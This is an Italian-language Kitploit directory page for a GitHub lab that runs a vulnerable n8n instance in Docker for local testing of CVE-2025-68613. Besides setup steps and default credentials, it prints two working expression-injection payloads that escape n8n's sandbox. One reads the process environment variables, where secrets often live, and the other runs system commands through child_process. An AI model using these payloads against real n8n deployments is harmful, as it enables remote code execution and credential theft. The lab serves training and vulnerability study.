Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-68613-n8n-lab — Analisi di CVE-2025-68613 | Kitploit
Strumenti/GitHubGitHub/r4j3sh-com/cve-2025-68613-n8n-lab
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneLab e Pratica
GitHubr4j3sh-com/cve-2025-68613-n8n-lab

CVE-2025-68613-n8n-lab

Analisi di CVE-2025-68613

Vedi Repository
28 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-68613 Laboratorio locale n8n

Questo repository fornisce una semplice configurazione Docker Compose che esegue un'istanza n8n vulnerabile per test locali di CVE-2025-68613.

Requisiti

  • Docker Desktop o Docker Engine
  • Docker Compose v2

Avvio rapido

  1. Avvia il container:

    root@kitploit:~
    docker compose up -d
    
  2. Apri n8n nel tuo browser:

    • http://localhost:5678
  3. Accedi con le credenziali predefinite impostate in docker-compose.yml:

    • Nome utente: admin
    • Password: password

Arresto e pulizia

root@kitploit:~
docker compose down

Esclusione di responsabilità e sicurezza

Scarica lo strumento

Questo ambiente è destinato esclusivamente a test locali e isolati. Non esporre questa istanza a internet pubblico o a reti non attendibili. Mantienila su un segmento di rete privato ed esclusivamente locale, separato dai sistemi di produzione. Utilizzala a tuo rischio e pericolo.

Verifica della vulnerabilità (Proof of Concept)

Una volta avviato il container, puoi accedere all'interfaccia n8n all'indirizzo http://localhost:5678. Per testare la vulnerabilità, dovrai iniettare un payload JavaScript dannoso in un campo espressione.

Passaggi per la riproduzione:

  1. Accedi: apri la dashboard (se hai configurato l'autenticazione di base, usa le credenziali fornite; altrimenti, crea un nuovo account proprietario).
  2. Crea Workflow: fai clic su "Add Workflow" o vai su https://n8n.example.com/workflow/new.
  3. Aggiungi Node: aggiungi un nodo "Set".
  4. Inietta il Payload: nel campo "Value" del nodo Set (assicurati di attivare la modalità "Expression" se disponibile, oppure incolla semplicemente la sintassi che n8n interpreta come espressione), inserisci uno dei seguenti payload:

Test 1: Esfiltrazione di variabili d'ambiente Questo payload tenta di accedere alle variabili d'ambiente del processo, che spesso contengono segreti.

root@kitploit:~
{{ (function() { return this.process.env; })() }}

Esfiltrazione di variabili d'ambiente

Test 2: Esecuzione remota di codice (RCE) Questo payload tenta di caricare il modulo child_process per eseguire comandi di sistema (es. whoami).

root@kitploit:~
{{ (function() {
    var require = this.process.mainModule.require;
    var execSync = require('child_process').execSync;
    return execSync('whoami').toString();
})() }}

Esempio RCE per il comando id

Risultato atteso: Se l'ambiente è vulnerabile, il pannello "Output" del nodo Set mostrerà il risultato del comando (es. root o l'utente n8n) o un oggetto JSON contenente le variabili d'ambiente. Se l'istanza fosse aggiornata con la patch (es. versione 1.122.0+), la sandbox restituirebbe un oggetto vuoto o un errore.